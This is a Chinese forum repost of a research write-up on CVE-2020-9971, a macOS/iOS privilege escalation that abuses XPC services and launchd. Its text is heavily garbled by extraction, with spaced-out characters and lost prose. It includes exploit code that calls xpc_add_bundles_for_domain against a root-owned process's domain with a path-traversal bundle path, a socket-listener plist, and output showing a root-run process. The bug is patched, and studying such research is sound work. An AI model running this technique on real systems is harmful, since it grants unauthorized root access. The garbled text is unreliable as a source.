搜索

[20467] 2021-01-13_CVE-2020-9971滥用XPC服务机制来提升macOSiOS中的特权

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-18
2021-01-13_CVE-2020-9971滥用XPC服务机制来提升macOSiOS中的特权 C V E - 2 0 2 0 - 9 9 7 1 X P C m a c O S   /   i O S Z h i p e n g   H u o   K h a n   2 0 2 1 - 0 1 - 1 3 0 x 0                       X P C l a u n c h d 1 0 0 % m a c O S / i O S 1 0 0 % m a c O S / i O S   l a u n c h d   使 m a c O S   B i g   S u r i O S   1 3 . 5 使 0 x 1   X P C                         X P C     C o n t e n t s / X P C S e r v i c e s   X P C F a c e T i m e X P C     l a u n c h d   X P C   S e r v i c e L a u n c h D a e m o n L a u n c h A g e n t L a u n c h D a e m o n L a u n c h A g e n t X P C   S e r v i c e m a c O S X c o d e X P C
0 x 2                           X P C l a u n c h d l a u n c h d X P C   l a u n c h d                           X P C   S e r v i c e                         X P C   S e r v i c e l a u n c h d   l a u n c h c t l     P I D   l a u n c h c t l   p r i n t   p i d / 1 2 9                       l a u n c h d s a e l o b i t s _ o f _ l a u n c h d 0 x 3                           l a u n c h c t l " 使 r o o t "                         使
X P C X P C l a u n c h d 访 m a c O S X P C   S e r v i c e 访 访 p i d p i d 访 X P C r o o t s a n d b o x _ c h e c k _ b y _ a u d i t _ t o k e n ( " f o r b i d d e n - l a u n c h d - c o n t r o l " ,   S A N D B O X _ C H E C K _ N O _ R E P O R T )   = =   0 X P C 3 使 a p i   s a n d b o x _ c h e c k _ b y _ a u d i t _ t o k e n a u d i t _ t o k e n 0 X P C 1 X P C 访 . / 使 X P C 0 x 4           X P C                                 m a c O S r o o t 使 / u s r / s b i n / s y s t e m s o u n d s e r v e r d         b o o l   _ _ f a s t c a l l   s u b _ 1 0 0 0 0 B 4 4 0 ( c h a r   * a 1 ,   c h a r   * a 2 ) {   s i z e _ t   v 2 ;   / /   r a x   v 2   =   s t r l e n ( a 2 ) ;   r e t u r n   s t r n c m p ( a 1 ,   a 2 ,   v 2 )   = =   0 ; }
        s u d o   l a u n c h c t l   p r i n t   p i d / 3 0 8         X P C l i b x p c l i b x p c l i b x p c . c o m a p i x p c _ a d d _ b u n d l e s _ f o r _ d o m a i n                 l i b x p c . d y l i b a p i   x p c _ a d d _ b u n d l e s _ f o r _ d o m a i n X P C 使 X P C M A C H b o o t s t r a p l a u n c h d                 e x p l o i t X P C s y s t e m s o u n d s e r v e r d X P C l a u n c h c t l   p r i n t   p i d / 3 0 8 / c o m . r 3 d f 0 9 . t e s t . t e s t X P C c o m . a p p l e . x p c . l a u n c h d . d o m a i n . p i d . s y s t e m s o u n d s e r v e r d . 3 0 8   =   {     t y p e   =   p r o c e s s     h a n d l e   =   3 0 8     a c t i v e   c o u n t   =   1 1     o n - d e m a n d   c o u n t   =   1     s e r v i c e   c o u n t   =   1 0     a c t i v e   s e r v i c e   c o u n t   =   0     a c t i v i t y   r a t i o   =   0 . 0 0     o r i g i n a t o r   =   / u s r / s b i n     c r e a t o r   =   s y s t e m s o u n d s e r v . 3 0 8     c r e a t o r   e u i d   =   0     u n i q u e i d   =   3 0 8     e x t e r n a l   a c t i v a t i o n   c o u n t   =   0     s e c u r i t y   c o n t e x t   =   {         u i d   u n s e t         a s i d   =   1 0 0 0 0 0     }     . . . } x p c _ o b j e c t _ t   p i d _ d i c t   =   x p c _ d i c t i o n a r y _ c r e a t e ( N U L L ,   N U L L ,   0 ) ; x p c _ d i c t i o n a r y _ s e t _ i n t 6 4 ( p i d _ d i c t ,   " p i d " ,   3 0 8 ) ;       / /   t a r g e t   p r o c e s s   d o m a i n N S S t r i n g *   m a i n B u n d l e P a t h   =   [ [ N S B u n d l e   m a i n B u n d l e ]   b u n d l e P a t h ] ; N S S t r i n g *   b u n d l e P a t h   =   [ N S S t r i n g   s t r i n g W i t h F o r m a t : @ " / u s r / s b i n / . . / . . % @ / . . / t e s t X P C . x p c " ,   m a i n B u n d l e P a t h ] ;   x p c _ o b j e c t _ t   x p c _ b u n d l e   =   x p c _ s t r i n g _ c r e a t e ( [ b u n d l e P a t h   U T F 8 S t r i n g ] ) ; x p c _ o b j e c t _ t   p a t h s   =   x p c _ a r r a y _ c r e a t e ( & x p c _ b u n d l e ,   1 ) ;     / /   X P C   S e r v i c e s   p a t h x p c _ a d d _ b u n d l e s _ f o r _ d o m a i n ( p i d _ d i c t ,   p a t h s ) ; c o m . r 3 d f 0 9 . t e s t . t e s t X P C   =   {     a c t i v e   c o u n t   =   0     c o p y   c o u n t   =   0
        X P C s y s t e m s o u n d s e r v e r d                 !                 X P C !                 X P C   "   "                 X P C 使         !                 m a n   l a u n c h d . p l i s t s o c k e t                 X P C p l i s t S o c k e t s X P C s o c k e t X P C 9 9 9 9     o n e   s h o t   =   0     p a t h   =   / U s e r s / r 3 d f 0 9 / D e s k t o p / t e s t X P C . x p c     s t a t e   =   w a i t i n g     b u n d l e   i d   =   c o m . r 3 d f 0 9 . t e s t . t e s t X P C     b u n d l e   v e r s i o n   =   1     p r o g r a m   =   / U s e r s / r 3 d f 0 9 / D e s k t o p / t e s t X P C . x p c / C o n t e n t s / M a c O S / t e s t X P C     i n h e r i t e d   e n v i r o n m e n t   =   {         P A T H   = >   / u s r / b i n : / b i n : / u s r / s b i n : / s b i n     }     . . . } < k e y > L a u n c h P r o p e r t i e s < / k e y > < d i c t >     < k e y > S o c k e t s < / k e y >     < d i c t >         < k e y > L i s t e n e r s < / k e y >         < d i c t >             < k e y > S o c k S e r v i c e N a m e < / k e y >             < s t r i n g > 9 9 9 9 < / s t r i n g >             < k e y > S o c k T y p e < / k e y >             < s t r i n g > s t r e a m < / s t r i n g >         < / d i c t >     < / d i c t > < / d i c t > < k e y > X P C S e r v i c e < / k e y > < d i c t >     < k e y > S e r v i c e T y p e < / k e y >     < s t r i n g > A p p l i c a t i o n < / s t r i n g > < / d i c t >
l a u n c h d 9 9 9 9 使   l a u n c h d     r o o t     X P C   0 x 5                                   l a u n c h d 访 a u d i t _ t o k e n p i d c o m . r 3 d f 0 9 . t e s t . t e s t X P C   =   {     . . .     s o c k e t s   =   {         " L i s t e n e r s "   =   {             t y p e   =   s t r e a m             s e r v i c e   n a m e   =   9 9 9 9             s o c k e t s   =   {                 4 0   ( n o   b y t e s   t o   r e a d )                 4 5   ( n o   b y t e s   t o   r e a d )             }             a c t i v e   =   0             p a s s i v e   =   1             b o n j o u r   =   0             i p v 4 v 6   =   0             r e c e i v e _ p a c k e t _ i n f o   =   0         }     }     . . . } A c t i v e   I n t e r n e t   c o n n e c t i o n s   ( i n c l u d i n g   s e r v e r s ) P r o t o   R e c v - Q   S e n d - Q     L o c a l   A d d r e s s                     F o r e i g n   A d d r e s s                 ( s t a t e )         t c p 4               0             0     * . 9 9 9 9                                   * . *                                         L I S T E N           t c p 6               0             0     * . 9 9 9 9                                   * . *                                         L I S T E N           u d p 4               0             0     * . *                                         * . *                                                               u d p 4               0             0     * . 5 6 1 2 4                                 * . * r 3 d f 0 9 @ r 3 d f 0 9 s - M a c   ~   %   p s   - A   |   g r e p   t e s t     6 3 8   ? ?                   0 : 0 0 . 0 1   / U s e r s / r 3 d f 0 9 / D e s k t o p / t e s t X P C . x p c / C o n t e n t s / M a c O S / t e s t X P C     6 4 3   t t y s 0 0 0         0 : 0 0 . 0 0   g r e p   t e s t r 3 d f 0 9 @ r 3 d f 0 9 s - M a c   ~   %   p s   - p   6 3 8   - o   u i d , p i d     U I D       P I D         0       6 3 8
0 x 6   i O S         m a c O S i O S                 i O S m a c O S l a u n c h d i O S                 i O S   1 3 . 5 X P C                 i O S   1 3 . 5 使 x p c _ b u n d l e _ g e t _ p a t h X P C   S e r v i c e a p i . . . /           i O S   1 3 . 5 a p i 2 x p c _ b u n d l e _ g e t _ p r o p e r t y a p i X P C   S e r v i c e . / 使 访 X P C   S e r v i c e X P C S e r v i c e                 i O S   1 4 . 0                 i O S 使 X P C   S e r v i c e 使                 / u s r / s b i n / w i f i d / u s r / s b i n / m e d i a s e r v e r d                   便 2 0 2 0 1 2 1 5 i O S   1 4 . 0 0 x 7             X P C 使 b u g h t t p s : / / x l a b . t e n c e n t . c o m / e n / 2 0 2 1 / 0 1 / 1 1 / c v e - 2 0 2 0 - 9 9 7 1 - a b u s i n g - x p c - s e r v i c e - t o - e l e v a t e - p r i v i l e g e /
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理